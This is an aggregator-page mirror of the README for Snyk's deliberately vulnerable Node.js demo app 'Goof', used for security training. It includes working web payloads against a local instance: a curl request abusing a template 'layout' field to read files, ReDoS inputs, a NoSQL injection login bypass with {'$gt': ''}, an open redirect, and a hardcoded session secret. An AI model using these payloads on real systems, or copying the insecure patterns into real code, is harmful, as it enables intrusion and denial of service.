在线时间:8:00-16:00
迪恩网络APP
随时随地掌握行业动态
扫描二维码
关注迪恩网络微信公众号
开源软件名称:snyk-labs/nodejs-goof开源软件地址:https://github.com/snyk-labs/nodejs-goof开源编程语言:JavaScript 52.5%开源软件介绍:Goof - Snyk's vulnerable demo appA vulnerable Node.js demo application, based on the Dreamers Lab tutorial. FeaturesThis vulnerable app includes the following capabilities to experiment with:
Runningmongod &
git clone https://github.com/snyk-labs/nodejs-goof
npm install
npm start This will run Goof locally, using a local mongo on the default port and listening on port 3001 (http://localhost:3001) Running with docker-composedocker-compose up --build
docker-compose down Heroku usageGoof requires attaching a MongoLab service to be deployed as a Heroku app. That sets up the MONGOLAB_URI env var so everything after should just work. CloudFoundry usageGoof requires attaching a MongoLab service and naming it "goof-mongo" to be deployed on CloudFoundry. The code explicitly looks for credentials to that service. CleanupTo bulk delete the current list of TODO items from the DB run: npm run cleanup Exploiting the vulnerabilitiesThis app uses npm dependencies holding known vulnerabilities, as well as insecure code that introduces code-level vulnerabilities. The Vulnerabilities in open source dependenciesHere are the exploitable vulnerable packages:
Vulnerabilities in code
Code injectionThe page at The same view is used for both the GET request which shows the account details, as well as the form itself for a POST request which updates the account details. A so-called Server-side Rendering. The form is completely functional. The way it works is, it receives the profile information from the You'd think that what's the worst that can happen because we use a validation to confirm the expected input, however the validation doesn't take into account a new field that can be added to the object, such as curl -X 'POST' --cookie c.txt --cookie-jar c.txt -H 'Content-Type: application/json' --data-binary '{"username": "[email protected]", "password": "SuperSecretPassword"}' 'http://localhost:3001/login' curl -X 'POST' --cookie c.txt --cookie-jar c.txt -H 'Content-Type: application/json' --data-binary '{"email": "[email protected]", "firstname": "admin", "lastname": "admin", "country": "IL", "phone": "+972551234123", "layout": "./../package.json"}' 'http://localhost:3001/account_details' Actually, there's even another vulnerability in this code.
The curl -X 'POST' -H 'Content-Type: application/json' --data-binary "{\"email\": \"`seq -s "" -f "<" 100000`\"}" 'http://localhost:3001/account_details' The curl -X 'POST' -H 'Content-Type: application/json' --data-binary "{\"email\": \"[email protected]\", \"country\": \"nop\", \"phone\": \"0501234123\", \"lastname\": \"nop\", \"firstname\": \"`node -e 'console.log(" ".repeat(100000) + "!")'`\"}" 'http://localhost:3001/account_details' NoSQL injectionA POST request to We can send a request with an incorrect password to see that we get a failed attempt echo '{"username":"[email protected]", "password":"WrongPassword"}' | http --json $GOOF_HOST/login -v And another request, as denoted with the following JSON request to sign-in as the admin user works as expected: echo '{"username":"[email protected]", "password":"SuperSecretPassword"}' | http --json $GOOF_HOST/login -v However, what if the password wasn't a string? what if it was an object? Why would an object be harmful or even considered an issue? Consider the following request: echo '{"username": "[email protected]", "password": {"$gt": ""}}' | http --json $GOOF_HOST/login -v We know the username, and we pass on what seems to be an object of some sort.
That object structure is passed as-is to the Open redirectThe
One fault here is that the
To exploit the open redirect, simply provide a URL such as Hardcoded values - session informationThe application initializes a cookie-based session on app.use(session({
secret: 'keyboard cat',
name: 'connect.sid',
cookie: { secure: true }
})) As you can see, the session First attempt to fix it, can be to move it out to a config file such as: module.exports = {
cookieSecret: `keyboard cat`
} And then require the configuration file and use it to initialize the session. However, that still maintains the secret information inside another file, and Snyk Code will warn you about it. Another case we can discuss here in session management, is that the cookie setting is initialized with Snyk Code will also find hardcoded secrets in source code that isn't part of the application logic, such as Docker Image ScanningThe To scan the image for vulnerabilities, run: snyk test --docker node:6-stretch --file=Dockerfile To monitor this image and receive alerts with Snyk: snyk monitor --docker node:6-stretch Runtime AlertsSnyk provides the ability to monitor application runtime behavior and detect an invocation of a function is known to be vulnerable and used within open source dependencies that the application makes use of. The agent is installed and initialized in app.js. For the agent to report back to your snyk account on the vulnerabilities it detected it needs to know which project on Snyk to associate with the monitoring. Due to that, we need to provide it with the project id through an environment variable To run the Node.js app with runtime monitoring: SNYK_PROJECT_ID=<PROJECT_ID> npm start ** The app will continue to work normally even if not provided a project id Fixing the issuesTo find these flaws in this application (and in your own apps), run:
In this application, the default |
2023-10-27
2022-08-15
2022-08-17
2022-09-23
2022-08-13
请发表评论